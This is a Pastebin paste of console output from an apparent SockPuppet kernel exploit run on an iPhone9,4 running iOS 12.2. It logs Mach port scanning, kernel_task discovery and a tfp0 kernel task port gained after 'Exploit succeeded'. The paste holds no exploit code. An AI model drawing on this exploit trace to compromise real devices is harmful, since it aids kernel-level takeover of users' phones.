Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- SockPuppet Kernel Exploit For A7/A8 (4K) By GeoSn0w
- On top of Ned Williamson's exploit!
- [D] platform: iPhone9,4 16E227
- TestKit: Kernel Address Tested: 0xffffffffdeadbeef ----- NOT A KADDR! Bail out
- TestKit: Kernel Address Tested: 0xffffffe002690bd0 ----- GOT A KADDR!
- Task port is 0xffffffe002690bd0
- TestKit: Kernel Address Tested: 0xffffffe0003562c8 ----- GOT A KADDR!
- Got candidate port: 0xffffffe000354000
- --> Port IP_BITS: 0x8000001c
- Got candidate port: 0xffffffe0003540a8
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000354150
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe0003541f8
- --> Port IP_BITS: 0x80000000
- Got candidate port: 0xffffffe0003542a0
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000354348
- --> Port IP_BITS: 0x80000000
- Got candidate port: 0xffffffe0003543f0
- --> Port IP_BITS: 0x8000001c
- Got candidate port: 0xffffffe000354498
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000354540
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe0003545e8
- --> Port IP_BITS: 0x8000001c
- Got candidate port: 0xffffffe000354690
- --> Port IP_BITS: 0x8000001c
- Got candidate port: 0xffffffe000354738
- --> Port IP_BITS: 0x8d78e894
- Got candidate port: 0xffffffe0003547e0
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000354888
- --> Port IP_BITS: 0x80000000
- Got candidate port: 0xffffffe000354930
- --> Port IP_BITS: 0x80000000
- Got candidate port: 0xffffffe0003549d8
- --> Port IP_BITS: 0x80000000
- Got candidate port: 0xffffffe000354a80
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000354b28
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000354bd0
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000354c78
- --> Port IP_BITS: 0x80000000
- Got candidate port: 0xffffffe000354d20
- --> Port IP_BITS: 0x8000001c
- Got candidate port: 0xffffffe000354dc8
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000354e70
- --> Port IP_BITS: 0x8000001c
- Got candidate port: 0xffffffe000354f18
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000354fc0
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000355068
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000355110
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe0003551b8
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000355260
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000355308
- --> Port IP_BITS: 0x80000000
- Got candidate port: 0xffffffe0003553b0
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000355458
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000355500
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe0003555a8
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000355650
- --> Port IP_BITS: 0x80008008
- Got candidate port: 0xffffffe0003556f8
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe0003557a0
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000355848
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe0003558f0
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000355998
- --> Port IP_BITS: 0x80000013
- Got candidate port: 0xffffffe000355a40
- --> Port IP_BITS: 0x8000001a
- Got candidate port: 0xffffffe000355ae8
- --> Port IP_BITS: 0x80000019
- Got candidate port: 0xffffffe000355b90
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000355c38
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000355ce0
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000355d88
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000355e30
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000355ed8
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000355f80
- --> Port IP_BITS: 0x80000001
- Got candidate port: 0xffffffe000356028
- --> Port IP_BITS: 0x80000005
- Got candidate port: 0xffffffe0003560d0
- --> Port IP_BITS: 0x80000007
- Got candidate port: 0xffffffe000356178
- --> Port IP_BITS: 0x80000006
- Got candidate port: 0xffffffe000356220
- --> Port IP_BITS: 0x80000004
- Got candidate port: 0xffffffe0003562c8
- --> Port IP_BITS: 0x80000003
- Got candidate port: 0xffffffe000356370
- --> Port IP_BITS: 0x80000011
- Got candidate port: 0xffffffe000356418
- --> Port IP_BITS: 0x80000028
- Got candidate port: 0xffffffe0003564c0
- --> Port IP_BITS: 0x80000002
- --> Task: 0xffffffe00037dc20
- --> PID: 0
- TestKit: Kernel Address Tested: 0xffffffe002690bd0 ----- GOT A KADDR!
- Found a KADDR
- [-] mach_vm_read_overwrite returned 1: (os/kern) invalid address
- [-] could not read address 0xffffffe005e08800
- Trying next potential kernel_task port...
- [-] mach_vm_read_overwrite returned 1: (os/kern) invalid address
- [-] could not read address 0xffffffe005e08800
- Trying next potential kernel_task port...
- [-] mach_vm_read_overwrite returned 1: (os/kern) invalid address
- [-] could not read address 0xffffffe005e08800
- Trying next potential kernel_task port...
- [-] mach_vm_read_overwrite returned 1: (os/kern) invalid address
- [-] could not read address 0xffffffe005e08800
- Trying next potential kernel_task port...
- kernel_task port found; read 0xffffffe004d87648 from 0xffffffe005e08800
- Copied fake kernel_task port to its own page, cleaning up...
- Exploit succeeded
- Got: tfp0 0x25607
- iPhone9,4 Cat 18.5.0 Darwin Darwin Kernel Version 18.5.0: Tue Mar 5 19:52:17 PST 2019; root:xnu-4903.252.2~1/RELEASE_ARM64_T8010
- Page size is 0x4000
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement